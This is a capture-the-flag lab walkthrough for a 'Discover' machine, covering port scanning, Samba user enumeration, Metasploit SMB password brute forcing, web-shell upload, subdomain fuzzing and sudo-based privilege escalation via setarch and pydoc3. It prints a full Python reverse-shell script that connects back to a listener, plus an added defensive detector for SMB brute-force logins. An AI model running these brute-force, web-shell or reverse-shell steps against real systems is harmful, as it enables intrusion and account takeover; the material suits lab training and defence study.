# Lab setup
Download: Discover
NAT, IP: 192.168.1.160
# Penetration process
# Initial information gathering
```
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp  open  http        nginx 1.18.0
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.18.0
81/tcp  open  http        Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
```
Enumerate users through Samba:
```
S-1-22-1-1000 Unix User\ken (Local User)
S-1-22-1-1001 Unix User\takeshi (Local User)
```
Let's brute-force the account with Metasploit:
```
msf6 auxiliary(scanner/smb/smb_login) > show options

Module options (auxiliary/scanner/smb/smb_login):

   Name               Current Setting                   Required  Description
   ----               ---------------                   --------  -----------
   ABORT_ON_LOCKOUT   false                             yes       Abort the run when an account lockout is detected
   ANONYMOUS_LOGIN    false                             yes       Attempt to login with a blank username and password
   BLANK_PASSWORDS    false                             no        Try blank passwords for all users
   BRUTEFORCE_SPEED   5                                 yes       How fast to bruteforce, from 0 to 5
   CreateSession      false                             no        Create a new session for every successful login
   DB_ALL_CREDS       false                             no        Try each user/password couple stored in the current database
   DB_ALL_PASS        false                             no        Add all passwords in the current database to the list
   DB_ALL_USERS       false                             no        Add all users in the current database to the list
   DB_SKIP_EXISTING   none                              no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
   DETECT_ANY_AUTH    false                             no        Enable detection of systems accepting any authentication
   DETECT_ANY_DOMAIN  false                             no        Detect if domain is required for the specified user
   PASS_FILE          /usr/share/wordlists/rockyou.txt  no        File containing passwords, one per line
   PRESERVE_DOMAINS   true                              no        Respect a username that contains a domain name.
   Proxies                                              no        A proxy chain of format type:host:port[,type:host:port][...]
   RECORD_GUEST       false                             no        Record guest-privileged random logins to the database
   RHOSTS             192.168.1.160                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT              445                               yes       The SMB service port (TCP)
   SMBDomain          .                                 no        The Windows domain to use for authentication
   SMBPass                                              no        The password for the specified username
   SMBUser            ken                               no        The username to authenticate as
   STOP_ON_SUCCESS    true                              yes       Stop guessing when a credential works for a host
   THREADS            500                               yes       The number of concurrent threads (max one per host)
   USERPASS_FILE                                        no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS       false                             no        Try the username as the password for all users
   USER_FILE                                            no        File containing usernames, one per line
   VERBOSE            true                              yes       Whether to print output for all attempts

View the full module info with the info, or info -d command.
```
Got the credentials: ken/kenken
Since the share path is not visible, it still has to be enumerated:
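From the defender's side, the smb_login run above is a burst of failed SMB logons for one user from one host, followed by a success. As an added example that is not part of the original writeup, here is a small detector over Samba `auth_audit` log lines; the line layout is assumed from Samba's auth_audit format, and the sample lines, IPs and port numbers are constructed for the demo.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Regex for Samba "auth_audit" lines (log level auth_audit:3). The field
# layout is assumed from Samba's documented format; adjust if yours differs.
AUTH_RE = re.compile(
    r"user \[(?P<domain>[^\]]*)\]\\\[(?P<user>[^\]]*)\] at \[(?P<ts>[^\]]+)\]"
    r".*?status \[(?P<status>NT_STATUS_[A-Z_]+)\]"
    r".*?remote host \[ipv4:(?P<src>[\d.]+):\d+\]"
)

def parse_line(line):
    """Return (timestamp, src_ip, user, status), or None for non-auth lines."""
    m = AUTH_RE.search(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"].rsplit(" ", 1)[0], "%a, %d %b %Y %H:%M:%S.%f")
    return ts, m["src"], m["user"], m["status"]

def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Flag a source IP once it has `threshold` failures inside `window`; a later
    NT_STATUS_OK from that IP is reported as a probable credential compromise."""
    failures = defaultdict(deque)   # src_ip -> timestamps of recent failures
    flagged, findings = set(), []
    for rec in filter(None, map(parse_line, lines)):
        ts, src, user, status = rec
        if status == "NT_STATUS_OK":
            if src in flagged:
                findings.append(("success_after_bruteforce", src, user))
            continue
        q = failures[src]
        q.append(ts)
        while q and ts - q[0] > window:   # drop failures outside the window
            q.popleft()
        if len(q) >= threshold and src not in flagged:
            flagged.add(src)
            findings.append(("bruteforce", src, user))
    return findings

# Constructed sample log: one benign failure from another host, then a burst
# against "ken" that ends in a success from the same source (placeholder IPs).
def _line(sec, user, status, src):
    return (f"Auth: [SMB2,(null)] user [WORKGROUP]\\[{user}] at "
            f"[Tue, 28 May 2024 03:09:{sec:02d}.000000 UTC] with [NTLMv2] status [{status}] "
            f"workstation [KALI] remote host [ipv4:{src}:51000] mapped to [WORKGROUP]\\[{user}]. "
            f"local host [ipv4:192.168.1.160:445]")

SAMPLE_LOG = [_line(0, "ken", "NT_STATUS_LOGON_FAILURE", "192.168.1.50")]
SAMPLE_LOG += [_line(s, "ken", "NT_STATUS_LOGON_FAILURE", "192.168.1.129") for s in range(1, 7)]
SAMPLE_LOG.append(_line(7, "ken", "NT_STATUS_OK", "192.168.1.129"))
```

Running `detect_bruteforce(SAMPLE_LOG)` reports the burst from 192.168.1.129 and then the success that follows it, while the single failure from 192.168.1.50 stays below the threshold.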
```
┌──(root㉿kali)-[~]
└─# smbmap -u ken -p kenken -H 192.168.1.160
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[+] IP: 192.168.1.160:445	Name: 192.168.1.160		Status: Authenticated
	Disk                 Permissions	Comment
	----                 -----------	-------
	print$               READ ONLY	Printer Drivers
	IPC$                 NO ACCESS	IPC Service (Samba 4.13.13-Debian)
	ken                  READ, WRITE	File Upload Path
```
Now that we know the share ken, connect to it:
```
┌──(root㉿kali)-[~]
└─# smbclient //192.168.1.160/ken -U ken
Password for [WORKGROUP\ken]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue May 28 03:09:04 2024
  ..                                  D        0  Mon Jul  3 17:19:50 2023
  index.html                          N       15  Tue Jul  4 06:33:20 2023

		7173040 blocks of size 1024. 4754604 blocks available
```
Uploaded a shell.php, but the server just serves it as a download.
Stuck...
Ran another directory scan; port 81 turns up an under_construction directory.
Opening it gives a 403, so try a POST request: `curl -X POST "http://192.168.1.160:81/under_construction" -L`
This yields a new domain name: todiscover.nyx
After adding it to the hosts file, fuzz the subdomains:
```
┌──(root㉿kali)-[~]
└─# wfuzz -t 100 -c --hl=7 -X POST -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.todiscover.nyx" "http://todiscover.nyx/shell.php"
```
Got a shell straight away.
# Privilege escalation
`sudo -l` shows a setarch entry:
```
sudo -u takeshi setarch $(arch) /bin/sh
```
Got takeshi's privileges.
Generate an SSH key pair, write the public key into authorized_keys, and log in.
`sudo -l` again shows the pydoc3 program, which can start a web service.
Write a reverse-shell Python script in takeshi's home directory:
```python
#!/usr/bin/python3
import os
import socket
import subprocess

# Connect back to the attacker's listener
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.129", 4444))
# Redirect stdin, stdout and stderr to the socket
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
p = subprocess.call(["/bin/bash", "-i"])
```
Bring up the web service: `sudo /usr/bin/pydoc3 -n 192.168.1.160 -b -p 8888`
Visit http://192.168.1.160:8888/
Start a listener, click the shell script, and root is obtained.